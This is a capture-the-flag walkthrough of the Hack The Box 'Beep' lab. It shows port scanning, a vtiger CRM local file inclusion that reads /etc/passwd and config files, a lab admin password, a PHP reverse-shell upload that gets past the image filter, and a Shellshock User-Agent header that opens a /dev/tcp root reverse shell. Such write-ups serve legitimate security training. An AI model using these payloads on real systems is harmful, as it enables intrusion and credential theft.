HTB – Beep

Hello friends!! Today we are going to solve another CTF challenge “Beep” which is available online for those who want to increase their skill in penetration testing and black box testing. Sense is retried vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level, they have collection of vulnerable labs as challenges from beginners to Expert level. We are going to start a new series of hack the box beginning with Beep craft which is designed for beginners.

Level: Intermediate

Task: find user.txt and root.txt file in victim’s machine.

Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.7 so let’s begin with nmap port enumeration.

c:\PENTEST\NMAP>nmap -sV 10.10.10.7
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-18 11:31 W. Europe Standard Time
Nmap scan report for 10.10.10.7
Host is up (0.031s latency).
Not shown: 988 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
25/tcp    open  smtp       Postfix smtpd
80/tcp    open  http       Apache httpd 2.2.3
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
443/tcp   open  ssl/http   Apache httpd 2.2.3 ((CentOS))
993/tcp   open  ssl/imap   Cyrus imapd
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4445/tcp  open  upnotifyp?
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 194.30 seconds

Knowing port 80 is open in victim’s network we preferred to explore his IP in browser but didn’t get any remarkable clue for the next step.

As you can see we are redirected to the Elastix Login Portal in the image below.

Next we have used dirb tool of kali to enumerate the directories from .txt file. The command we have used is dirb /usr/share/wordlists/dirb/big.txt . After checking most of the directories, we finally decided to go for vtigercrm directory.

So next we decided to explore http://10.10.10.7/vtigercrm through browser URL and what we see is another Login Portal of vtiger CRM 5 browser. After looking at the page for some clue, we saw a version of vtiger which is vtiger CRM 5.1 in the bottom left of the WebpageAs Shown Below.

We have find this vulnerabilitie in VTiger 5.1.0
In this example, you can see a Local file Inclusion in the file sortfieldsjson.php

Try this :
https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00

There is an interesting directory /vtigercrm for which we can look for2
After searching I found LFI exploits for vtigerCRM, and Vtiger login which we can use to read user flag and get admin credentials.

User Flag :-3
The username is fanis4
Now using the second LFI exploit we can read the Admin credentials5
Now read lines one by one untill you find the correct password6
Username = admin
Password = jEhdIekWmdjE
Using this credential we can login to VtigerCRM dashboard as Admin7.1

Shell
GO to Settings>Company Details> click on Edit and you will notice we can upload any image in place of company logo
We have to rename our PHP payload and add ;.jpg after .php to bypass browser image file upload restriction

First Method – (NC)
Download the PHP reverse shell payload and edit the IP and PORT accordingly. then browse the file and click on save and capture the POST request on burp1314
remove ;.jpg from the file and forward the request1516
Make sure the file has been uploaded successfully17
Now browse to the file location and get the shell18

Next we decided to use burp to exploit shellshock vulnerability.

burp : https://10.10.10.7:10000/session_login.cgi
GET /session_login.cgi HTTP/1.1
Host: 10.10.10.7:10000
User-Agent: () { :; }; bash -i >& /dev/tcp/10.10.14.12/8081 0>&1

After executing our burp command, we have simply started our listening services using netcat command nc -lvp 8081. Once we have establish a connection with the Victim Host. We used command ls to look for files, folder in the current directory.

c:\PENTEST>nc -lvp 8081
listening on [any] 8081 ...
10.10.10.7: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.7] 60581: NO_DATA
bash: no job control in this shell
[root@beep webmin]# id
uid=0(root) gid=0(root)

The ls command which gave us the root.txt file. Whose content we would like to see by using the cat root.txt command.

Simple way to find credentials and login with ssh

After searching I found LFI exploits for vtigerCRM, and Vtiger login which we can use to read user flag and get admin credentials.

https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00

https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/amportal.conf%00

I’m going to look for interesting files for the programs I know are installed and to which I have access, like Asterisk (https://www.voip-info.org/asterisk-config-files/).

Author: Jacco Straathof

 

 

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *